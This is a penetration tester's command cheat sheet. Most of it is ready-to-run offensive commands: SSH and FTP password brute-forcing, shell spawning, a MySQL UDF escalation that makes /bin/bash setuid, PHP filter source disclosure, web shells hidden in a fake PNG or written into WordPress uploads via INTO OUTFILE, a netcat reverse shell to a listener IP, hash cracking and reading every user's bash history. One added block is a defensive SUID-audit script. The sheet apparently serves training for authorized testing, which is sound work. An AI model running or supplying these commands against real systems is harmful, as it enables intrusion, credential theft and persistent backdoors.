Basic Commands for Penetration Testers: Part 1

1. Bruteforce:

a) Hydra:

hydra -l root -P [Path_to_file] [IPAddress] ssh

-l → username, or -L → username file

-p → password, or -P → password file


To Bruteforce ftp using password same as username and reverse of username:

hydra -l username -e nsr ftp://IP_Address

-e nsr tries, for each username, the following additional passwords:

n → null (empty) password

s → same as username

r → reverse of username


b) Ncrack:

ncrack -p 22 --user <usernames separated by comma> -P [Path_to_Password_File] [IPAddress]


ncrack -p 22 -U <Usernames Filename> --pass [comma separated password list] [IPAddress]

p → port number


c) Medusa:

medusa -u [username] -P [Path_to_Password File] -h [IPAddress] -M ssh


medusa -U [username File] -p [Password] -h [IPAddress] -M ssh

M → Name of module eg: ssh


2. Find all the files in Linux with suid bit set

find [path_to_search] -perm /u=s 2>/dev/null

/          –> path to search, e.g. / for the root directory

-perm      –> match on permission bits

/u=s       –> here u is the owner of the file and s stands for the suid bit

2>         –> 2 is the file descriptor for stderr; > redirects it to the null device file (hides "Permission denied" errors)

/dev/null  –> null device file


3. Find a file containing specific word in Linux

grep -rin -e '[word to search]' '[path to search]'

-r refers to recursive

-i refers to ignore case (optional)

-n refers to line number of the file where specific word is found


4. enum4linux

Tool for enumerating information from Windows and Samba systems.

Usage: ./ [options] ip


5. nikto

Scans a web server for known vulnerabilities and bruteforces directories. Always check for an SSL certificate; if one is present, also try connecting over https.

nikto -h [IPAddress|URL]


6. Listen on port using command:

nc -lvp [port]


7. Base 64 decode of any string:

echo [string] | base64 -d


8. Spawning a TTY shell

python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl -e 'exec "/bin/sh";'


9. If the file '' already exists on the system, escalate privileges using the mysql queries below, for example:

mysql> use mysql;

mysql> create function sys_exec returns integer soname '';

mysql> select sys_exec('chmod u+s /bin/bash');
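
As an added defender-side example (not from the original post), the shell helper below builds on the `find -perm` command of item 2 to catch SUID changes such as the `chmod u+s /bin/bash` of item 9: it lists the setuid files under a path and compares them with a baseline list recorded on a known-good system. The baseline file path in the comments is an assumed example.

```shell
#!/bin/sh
# Added example, not from the original post. Audit SUID binaries against a
# baseline so that an unexpected setuid file (e.g. /bin/bash after
# "chmod u+s /bin/bash") stands out. Record the baseline on a known-good host:
#   suid_list / > /var/lib/suid-baseline.txt      (assumed example path)
# then run periodically:
#   suid_audit / /var/lib/suid-baseline.txt

# Print every regular file under $1 that has the setuid bit set, sorted.
# -perm -4000 matches the setuid bit just like the post's -perm /u=s; stderr is
# discarded as in item 2 (unreadable directories are not errors for this check).
suid_list() {
    find "$1" -type f -perm -4000 2>/dev/null | LC_ALL=C sort -u
}

# Compare the live listing of $1 with the baseline file $2 and print:
#   NEW <path>      setuid file that is not in the baseline (investigate)
#   MISSING <path>  baseline entry that is no longer setuid, or is gone
suid_audit() {
    audit_path="$1"; baseline="$2"
    live=$(mktemp) || return 1
    suid_list "$audit_path" > "$live"
    # comm -3 keeps lines unique to either side; lines from the second file
    # (the live listing) are prefixed with a tab, which awk uses to tell them apart
    LC_ALL=C sort -u "$baseline" | LC_ALL=C comm -3 - "$live" |
        awk -F'\t' '$1 != "" { print "MISSING " $1 } $2 != "" { print "NEW " $2 }'
    rm -f "$live"
}
```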


10. Run sudo command as other user:

sudo -u username [command]


11. Search IP locally using command other than nmap:

netdiscover -r [IP-Range]


12. Read the source of a PHP file by passing the wrapper 'php://filter/convert.base64-encode/resource=' in any URL parameter that includes a file.


This returns the base64-encoded source of index.php. Other files can be extracted the same way.


13. Create fake PNG file containing PHP code.


<?php system($_GET["cmd"]) ?>


14. Execute bash and hand the shell to the listener from item 6 (IP and port of the listening machine):

nc -nv [Listener_IP] 4444 -e /bin/bash


15. Permanently add a directory to the $PATH variable:

# add this command to `~/.profile` file

$ export PATH=$PATH:/myNewDir

# then run the source command

$ source ~/.profile


16. Using the command line tool 'dirb' for bruteforcing directories and files (it expects a URL):

dirb http://[IP Address]:[port]


17. Download a file using wget

wget [http|https]://[IPAddress]:[port]/Folder/filename


18. Command to see file type:

file [filename]


19. Command to see only strings in file

strings [Filename]


20. WordPress scanner command:

wpscan --url [URL]

-> Enumerate installed plugins:

wpscan --url [URL] --enumerate p

-> Enumerate all plugins:

wpscan --url [URL] --enumerate ap

-> Enumerate users:

wpscan --url [URL] --enumerate u

-> Use an HTTP proxy:

wpscan --url [URL] --proxy [proxy]


21. searchsploit command to find exploits present in Kali Linux

searchsploit [searchpattern]


22. Crack the hash using ‘john’ command

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Where hash.txt -> file containing the hash to be cracked.


23. Connect to mysql using an IP address (-p without a value prompts for the password; a space after -p would be read as a database name):

mysql -h [IP] -u [username] -p


24. Read the bash history of all users while in the /home directory

find -name ".bash_history" -exec cat {} \;

Where:

find -name –> finds all files named ".bash_history" in /home recursively

-exec –> executes the command given after it

{} –> refers to the name of each file that was found


cat */.bash_history


25. sudo -l command use:

the -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.


26. WordPress users can upload a shell using INTO OUTFILE.

select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/[blog_folder]/wp-content/uploads/shell.php";
